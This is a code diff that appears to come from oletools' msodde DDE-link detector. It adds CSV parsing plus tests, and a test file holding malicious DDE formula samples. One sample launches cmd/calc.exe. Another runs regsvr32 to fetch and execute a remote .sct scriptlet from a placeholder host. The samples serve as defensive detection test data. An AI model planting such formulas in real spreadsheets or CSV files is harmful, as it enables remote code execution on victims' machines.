  874 +
  875 + if is_small and not results:
  876 + # easy to mis-sniff small files. Try different delimiters
  877 + log.debug('small file, no results; try all delimiters')
  878 + file_handle.seek(0)
  879 + other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '')
  880 + for delim in other_delim:
  881 + try:
  882 + file_handle.seek(0)
  883 + results, _ = process_csv_dialect(file_handle, delim)
  884 + except csv.Error: # e.g. sniffing fails
  885 + log.debug('failed to csv-parse with delimiter {0!r}'
  886 + .format(delim))
  887 +
  888 + if is_small and not results:
  889 + # try whole file as single cell, since sniffing fails in this case
  890 + log.debug('last attempt: take whole file as single unquoted cell')
  891 + file_handle.seek(0)
  892 + match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH))
  893 + if match:
  894 + results.append(u' '.join(match.groups()[:2]))
  895 +
  896 + return u'\n'.join(results)
  897 +
  898 +
def process_csv_dialect(file_handle, delimiters):
    """ helper for process_csv: process with a specific csv dialect

    Sniffs delimiter / quote char from a sample of the file, then scans
    every cell for DDE-link patterns.

    :returns: 2-tuple (list of "<program> <arguments>" strings,
              sniffed :py:class:`csv.Dialect`)
    """
    # let the sniffer guess delimiter char, quote char, ... from a sample
    sample = file_handle.read(CSV_SMALL_THRESH)
    dialect = csv.Sniffer().sniff(sample, delimiters=delimiters)
    dialect.strict = False  # microsoft is never strict
    log.debug('sniffed csv dialect with delimiter {0!r} '
              'and quote char {1!r}'
              .format(dialect.delimiter, dialect.quotechar))

    # rewind file handle to start
    file_handle.seek(0)

    # scan every cell of every row for the dde-link pattern
    cell_matches = (CSV_DDE_FORMAT.match(cell)
                    for row in csv.reader(file_handle, dialect)
                    for cell in row)
    results = [u' '.join(found.groups()[:2])
               for found in cell_matches if found]
    return results, dialect
  923 +
  924 +
def process_file(filepath, field_filter_mode=None):
    """ decides which of the process_* functions to call

    Check order: OLE container (xls / doc), RTF magic bytes, OOXML type
    (xlsx / docx); a file that ooxml fails to parse at all is handed to
    the csv processor as a last resort.

    :param str filepath: path of the file to analyse
    :param field_filter_mode: forwarded to rtf / docx processing only;
                              default None
    :returns: result of the selected process_* function
    """
    if olefile.isOleFile(filepath):
        log.debug('Is OLE. Checking streams to see whether this is xls')
        if xls_parser.is_xls(filepath):
            log.debug('Process file as excel 2003 (xls)')
            return process_xls(filepath)
        else:
            log.debug('Process file as word 2003 (doc)')
            return process_doc(filepath)

    with open(filepath, 'rb') as file_handle:
        # NOTE(review): the handle is positioned right after the 4 magic
        # bytes when handed on -- presumably process_rtf expects that;
        # confirm against its implementation
        if file_handle.read(4) == RTF_START:
            log.debug('Process file as rtf')
            return process_rtf(file_handle, field_filter_mode)

    try:
        doctype = ooxml.get_type(filepath)
        log.debug('Detected file type: {0}'.format(doctype))
    except Exception as exc:
        # not xml at all: doctype None routes us to the csv branch below
        log.debug('Exception trying to xml-parse file: {0}'.format(exc))
        doctype = None

    if doctype == ooxml.DOCTYPE_EXCEL:
        # NOTE(review): field_filter_mode is no longer forwarded here --
        # confirm process_xlsx dropped that parameter
        log.debug('Process file as excel 2007+ (xlsx)')
        return process_xlsx(filepath)
    elif doctype is None:
        log.debug('Process file as csv')
        return process_csv(filepath)
    else:   # could be docx; if not: this is the old default code path
        log.debug('Process file as word 2007+ (docx)')
        return process_docx(filepath, field_filter_mode)
847 957  
848 958  
849   -#=== MAIN =================================================================
  959 +# === MAIN =================================================================
850 960  
851 961 def main(cmd_line_args=None):
852 962 """ Main function, called if this file is called as a script
... ... @@ -868,10 +978,10 @@ def main(cmd_line_args=None):
868 978 if args.json and args.loglevel.lower() == 'debug':
869 979 log.warning('Debug log output will not be json-compatible!')
870 980  
871   - if args.nounquote :
  981 + if args.nounquote:
872 982 global NO_QUOTES
873 983 NO_QUOTES = True
874   -
  984 +
875 985 if args.json:
876 986 jout = []
877 987 jout.append(BANNER_JSON)
... ... @@ -890,7 +1000,7 @@ def main(cmd_line_args=None):
890 1000 except Exception as exc:
891 1001 if args.json:
892 1002 jout.append(dict(type='error', error=type(exc).__name__,
893   - message=str(exc))) # strange: str(exc) is enclosed in ""
  1003 + message=str(exc)))
894 1004 else:
895 1005 raise # re-raise last known exception, keeping trace intact
896 1006  
... ...
tests/msodde/test_basic.py
... ... @@ -17,11 +17,13 @@ from traceback import print_exc
17 17  
18 18  
19 19 class TestReturnCode(unittest.TestCase):
  20 + """ check return codes and exception behaviour (not text output) """
20 21  
21 22 def test_valid_doc(self):
22 23 """ check that a valid doc file leads to 0 exit status """
23   - for filename in ('dde-test-from-office2003', 'dde-test-from-office2016',
24   - 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
  24 + for filename in (
  25 + 'dde-test-from-office2003', 'dde-test-from-office2016',
  26 + 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
25 27 self.do_test_validity(join(BASE_DIR, 'msodde',
26 28 filename + '.doc'))
27 29  
... ... @@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase):
65 67 except Exception:
66 68 have_exception = True
67 69 print_exc()
68   - except SystemExit as se: # sys.exit() was called
69   - return_code = se.code
70   - if se.code is None:
  70 + except SystemExit as exc: # sys.exit() was called
  71 + return_code = exc.code
  72 + if exc.code is None:
71 73 return_code = 0
72 74  
73 75 self.assertEqual(expect_error, have_exception or (return_code != 0),
... ... @@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase):
77 79  
78 80  
79 81 class TestDdeLinks(unittest.TestCase):
  82 + """ capture output of msodde and check dde-links are found correctly """
80 83  
81 84 def get_dde_from_output(self, capturer):
82   - """ helper to read dde links from captured output """
  85 + """ helper to read dde links from captured output
  86 +
  87 + duplicate in tests/msodde/test_csv
  88 + """
83 89 have_start_line = False
84 90 result = []
85 91 for line in capturer:
... ... @@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase):
90 96 elif line == 'DDE Links:':
91 97 have_start_line = True
92 98  
93   - self.assertTrue(have_start_line) # ensure output was complete
  99 + self.assertTrue(have_start_line) # ensure output was complete
94 100 return result
95 101  
96 102 def test_with_dde(self):
... ...
tests/msodde/test_blacklist.py
... ... @@ -39,8 +39,8 @@ EXAMPLES_MATCH = (
39 39 r'ADVANCE \x 150',
40 40 r'AUTHOR',
41 41 r'AUTHOR "Tony Caruso"',
42   - r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"
43   - r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
  42 + r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"
  43 + r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
44 44 r'COMMENTS',
45 45 r'COMMENTS "I came, I saw, I was not impressed."',
46 46 r'CREATEDATE',
... ... @@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = (
228 228 r'SKIPIF MERGEFIELD Order < 100',
229 229 )
230 230  
  231 +
231 232 class TestBlacklist(unittest.TestCase):
232 233 """ Tests msodde blacklist feature """
233 234  
... ...
tests/msodde/test_csv.py 0 → 100644
  1 +#!/usr/bin/env python3
  2 +
  3 +
  4 +""" Check various csv examples """
  5 +
  6 +import unittest
  7 +from tempfile import mkstemp
  8 +import os
  9 +from os.path import join
  10 +
  11 +from oletools import msodde
  12 +from tests.test_utils import OutputCapture, DATA_BASE_DIR
  13 +
  14 +
class TestCSV(unittest.TestCase):
    """ Check various csv examples """

    # set to True for verbose output and to keep temp files for inspection
    DO_DEBUG = False

    def test_texts(self):
        """ write some sample texts to file, run those

        Combines each sample payload with various prefixes, suffixes,
        delimiters and quote chars and expects exactly one dde-link per
        malicious sample (zero for the innocent one).
        """
        SAMPLES = (
            "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''",
            "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " +
            "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''",
            "completely innocent text"
        )

        LONG_SAMPLE_FACTOR = 100  # make len(sample) > CSV_SMALL_THRESH
        DELIMITERS = ',\t ;|^'
        QUOTES = '', '"'   # no ' since samples use those "internally"
        PREFIXES = ('', '{quote}item-before{quote}{delim}',
                    '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR,
                    '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR +
                    '{quote}item-before{quote}{delim}')
        SUFFIXES = ('', '{delim}{quote}item-after{quote}',
                    '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR,
                    '{delim}{quote}item-after{quote}' +
                    '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR)

        for sample_core in SAMPLES:
            for prefix in PREFIXES:
                for suffix in SUFFIXES:
                    for delim in DELIMITERS:
                        for quote in QUOTES:
                            # without quoting command is split at space or |
                            if quote == '' and delim in sample_core:
                                continue

                            sample = \
                                prefix.format(quote=quote, delim=delim) + \
                                quote + sample_core + quote + \
                                suffix.format(quote=quote, delim=delim)
                            output = self.write_and_run(sample)
                            n_links = len(self.get_dde_from_output(output))
                            desc = 'sample with core={0!r}, prefix-len {1}, ' \
                                   'suffix-len {2}, delim {3!r} and quote ' \
                                   '{4!r}'.format(sample_core, len(prefix),
                                                  len(suffix), delim, quote)
                            if 'innocent' in sample:
                                self.assertEqual(n_links, 0, 'found dde-link '
                                                             'in clean sample')
                            else:
                                msg = 'Failed to find dde-link in ' + desc
                                self.assertEqual(n_links, 1, msg)
                            if self.DO_DEBUG:
                                print('Worked: ' + desc)

    def test_file(self):
        """ test simple small example file """
        filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv')
        with OutputCapture() as capturer:
            capturer.reload_module(msodde)  # re-create logger
            ret_code = msodde.main([filename, ])
        self.assertEqual(ret_code, 0)
        links = self.get_dde_from_output(capturer)
        self.assertEqual(len(links), 1)
        self.assertEqual(links[0],
                         r"cmd '/k \..\..\..\Windows\System32\calc.exe'")

    def write_and_run(self, sample_text):
        """ helper for test_texts: save text to file, run through msodde

        :returns: the :py:class:`OutputCapture` holding msodde's output
        """
        filename = None
        handle = 0  # 0 = "no open handle" (mkstemp never returns fd 0 here)
        # fix: removed a no-op "except Exception: raise" clause -- exceptions
        # propagate anyway; try/finally alone handles the cleanup
        try:
            handle, filename = mkstemp(prefix='oletools-test-csv-', text=True)
            os.write(handle, sample_text.encode('ascii'))
            os.close(handle)
            handle = 0
            args = [filename, ]
            if self.DO_DEBUG:
                args += ['-l', 'debug']

            with OutputCapture() as capturer:
                capturer.reload_module(msodde)  # re-create logger
                ret_code = msodde.main(args)
            self.assertEqual(ret_code, 0, 'checking sample resulted in '
                                          'error:\n' + sample_text)
            return capturer

        finally:
            # close handle if writing failed midway, then remove temp file
            if handle:
                os.close(handle)
                handle = 0  # just in case
            if filename:
                if self.DO_DEBUG:
                    print('keeping for debug purposes: {0}'.format(filename))
                else:
                    os.remove(filename)
                filename = None  # just in case

    def get_dde_from_output(self, capturer):
        """ helper to read dde links from captured output

        duplicate in tests/msodde/test_basic
        """
        have_start_line = False
        result = []
        for line in capturer:
            if self.DO_DEBUG:
                print('captured: ' + line)
            if not line.strip():
                continue   # skip empty lines
            if have_start_line:
                result.append(line)
            elif line == 'DDE Links:':
                have_start_line = True

        self.assertTrue(have_start_line)   # ensure output was complete
        return result
  133 +
  134 +
# allow running this test module directly as a script
# (normally it is discovered and run by the test framework)
if __name__ == '__main__':
    unittest.main()
... ...
tests/ooxml/test_basic.py
... ... @@ -12,24 +12,33 @@ from oletools import ooxml
12 12 class TestOOXML(unittest.TestCase):
13 13 """ Tests my cool new feature """
14 14  
  15 + DO_DEBUG = False
  16 +
15 17 def test_all_rough(self):
16 18 """Checks all samples, expect either ole files or good ooxml output"""
17 19 acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \
18 20 ooxml.DOCTYPE_POWERPOINT
  21 +
  22 + # files that are neither OLE nor xml:
19 23 except_files = 'empty', 'text'
20   - except_extns = '.xml', '.rtf'
  24 + except_extns = '.xml', '.rtf', '.csv'
  25 +
  26 + # analyse all files in data dir
21 27 for base_dir, _, files in os.walk(DATA_BASE_DIR):
22 28 for filename in files:
23 29 if filename in except_files:
24   - #print('skip file: ' + filename)
  30 + if self.DO_DEBUG:
  31 + print('skip file: ' + filename)
25 32 continue
26 33 if splitext(filename)[1] in except_extns:
27   - #print('skip extn: ' + filename)
  34 + if self.DO_DEBUG:
  35 + print('skip extn: ' + filename)
28 36 continue
29 37  
30 38 full_name = join(base_dir, filename)
31 39 if isOleFile(full_name):
32   - #print('skip ole: ' + filename)
  40 + if self.DO_DEBUG:
  41 + print('skip ole: ' + filename)
33 42 continue
34 43 try:
35 44 doctype = ooxml.get_type(full_name)
... ... @@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase):
38 47 self.assertTrue(doctype in acceptable,
39 48 msg='Doctype "{0}" for {1} not acceptable'
40 49 .format(doctype, full_name))
41   - #print('ok: ' + filename + doctype)
  50 + if self.DO_DEBUG:
  51 + print('ok: {0} --> {1}'.format(filename, doctype))
42 52  
43 53  
44 54 # just in case somebody calls this file as a script
... ...
tests/test-data/msodde/dde-in-csv.csv 0 → 100644
  1 +=cmd|'/k \..\..\..\Windows\System32\calc.exe'!A0
... ...
tests/test_utils/output_capture.py
... ... @@ -2,13 +2,20 @@
2 2  
3 3 from __future__ import print_function
4 4 import sys
  5 +import logging
5 6  
6 7  
7 8 # python 2/3 version conflict:
8 9 if sys.version_info.major <= 2:
9 10 from StringIO import StringIO
  11 + # reload is a builtin
10 12 else:
11 13 from io import StringIO
  14 + if sys.version_info.minor < 4:
  15 + from imp import reload
  16 + else:
  17 + from importlib import reload
  18 +
12 19  
13 20 class OutputCapture:
14 21 """ context manager that captures stdout
... ... @@ -24,6 +31,10 @@ class OutputCapture:
24 31 # ...or test all output in one go
25 32 some_test(capturer.get_data())
26 33  
  34 + In order to solve issues with old logger instances still remembering closed
  35 + StringIO instances as "their" stdout, logging is shutdown and restarted
  36 + upon entering this Context Manager. This means that you may have to reload
  37 + your module, as well.
27 38 """
28 39  
29 40 def __init__(self):
... ... @@ -32,6 +43,11 @@ class OutputCapture:
32 43 self.data = None
33 44  
34 45 def __enter__(self):
  46 + # Avoid problems with old logger instances that still remember an old
  47 + # closed StringIO as their sys.stdout
  48 + logging.shutdown()
  49 + reload(logging)
  50 +
35 51 # replace sys.stdout with own buffer.
36 52 self.orig_stdout = sys.stdout
37 53 sys.stdout = self.buffer
... ... @@ -61,3 +77,7 @@ class OutputCapture:
61 77 def __iter__(self):
62 78 for line in self.get_data().splitlines():
63 79 yield line
  80 +
    def reload_module(self, mod):
        """ Wrapper around reload function for different python versions

        `reload` is resolved at module import time: the builtin on python 2,
        imp.reload on python 3.0-3.3, importlib.reload on 3.4+.
        Returns the freshly reloaded module object.
        """
        return reload(mod)
... ...